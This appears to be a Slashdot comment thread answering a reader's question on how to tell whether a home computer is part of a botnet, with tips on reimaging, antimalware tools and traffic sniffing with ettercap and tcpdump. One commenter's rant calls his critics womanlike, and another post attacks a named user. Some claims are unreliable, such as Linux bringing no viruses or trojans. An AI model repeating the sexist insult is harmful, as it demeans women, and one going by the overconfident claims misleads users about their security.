Ashraya,
I live in Hyderabad, and I install Linux for a lot of people (friends, relatives, etc) around the place. I don't do windows, but if they're willing to spend a wee bit of time with me showing them the basics I'm sure they'll manage pretty well. Maybe not a scratch+install, but a dual boot would be fine.
Contact me at sitaramc -at- gmail -dot- com if you're interested. I live in the Srinagar Colony area but within reason, I'll go anywhere to help.
Oh, just in case you were wondering: no strings attached. None. (I have a very nice day job thank you! I do this for fun :-)
Setup Linux something Like Ubuntu/Kubuntu on 2 computers Desktop and Laptop and all problems with botnets gun , no viruses , trojans and all this staff , is more secure to use it .
Torrents would seem like random connections to multiple machines.
Your first mistake is that you think not having a password on your router makes you get infected. You dont need linux or anything. Get Combofix and Malwarebytes. If you have anything its gone. If you really want to know, Ethereal works perfectly well. No need for a hub, or any of that bullshit. People rely way to much on linux.
I replace my OS from an image of my install back with all my softwares, so that an image can be reused in under 20 minutes, and you are good to go, once a month even is good, with or without traces of spyware or trojans etc... just to be safe. Also I keep all files personal off the c drive.
I also have a copy of an image for a client of mine that regularly gets viruses, he pays me for the reinstall each time, although it takes me 20min. I charge him my min. 1 hour.
The son in this case could just avoid alot of heartache for himself and his dad, and just clone an image after fresh install, and re use that each time the father says something is up, as well a config file can be backed up for the router (linksis) so that you hard reset and reuse a saved config file to re enable all the configured stuff on the router, except change to a new admin password!
http://tech.slashdot.org/comments.pl?sid=1327945&cid=28981391 seems to have easily put you in your place. You attempt to cut down others whom you have trolled before and when you are asked for evidences of your blustering after you had attacked other posters as you have here also, it seemed you have no proofs of anything you have ever done yourself in computing in the way of programming that was rated well by others after you called the posters there stupid and what not. Anyone can talk a good game like you do ion.simon.c but it's quite another issue to actually do a good game. After all, you're the one stupid enough to be a registered user here and it made it ridiculously easy to find your post history and catch you messing up yourself. You ran from that post, why is that?
This will happen again: the wireless driver stack in Windows is poorly written and, as a result, users will disable the 'security' features just to get it to work consistently. Put another operating system on there. I suggest DOS or Linux if you don't want it to be exploited again in such a fashion.
Frankly, I'm surprised this got posted to slashdot. This is like "how do I floss my teeth?" or maybe "why is air breathable?" - both questions with easily findable answers via google. Maybe you should've started there.
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
"How Can I Tell If My Computer Is Part of a Botnet?"
The ONLY way to be sure is to infect the machine. That way you can be 100% sure that it's infected. No more trying to figure out if it's infected or testing anything.
You can be certain using this method that the machine is or is not part of the Botnet.
Just boot up backtrack (the live linux cd) on another computer and use ettercap + tcpdump to sniff traffic on the switched network.
you could maybe setup a honeypot (Honeyd from the live cd) to see if your possibly infected computer is attacking other computers on your network.
Dude, your dad shut down twitter
Q: What do you call a Linux workstation on a network with other Linux workstations?
A: A Beowulf cluster
Q: What do you can a Windows machine on a network with other Windows machines?
A: A botnet.
Run snort into hothunter and see what happens on the reloaded machine. Bothunter is at SRI.
Per my subject-line above, plus, my even earlier replying & thanking whoever modded up my post INITIALLY to +1 INFORMATIVE? My post being @ "0 Troll" rating gives you away...
I.E.-> That "0 Troll" should have gone into the negative below zero ranges, & should have shown as "-1 Troll", if it were a troll & nobody modded it up. Obviously, someone did, before you rated it down, unjustifiably no less (like a woman would when proven wrong, not a man)...
Talk about stupidity in blowing a load of mod points for nothing on your parts (that's to my "naysayers" & trolls here that have nothing better in response once they get beaten - all they have then, is their effete mod-downs, but never any valid technically sound reasoning for it via replies)
APK
P.S.=> It must suck to live a life of a "not man", the kind that acts more like WOMEN DO, instead of a man does, operating via b.s. & rumor spreading + other dirty little tricks, like this one... whoever modded me down? You think about that, it IS directed, to you, specifically (&, it's the truth about you)... apk
Just flatten the system and rebuild it properly.
Bang! Botnet threat gone.
Please clone yourself...we need multiple copies.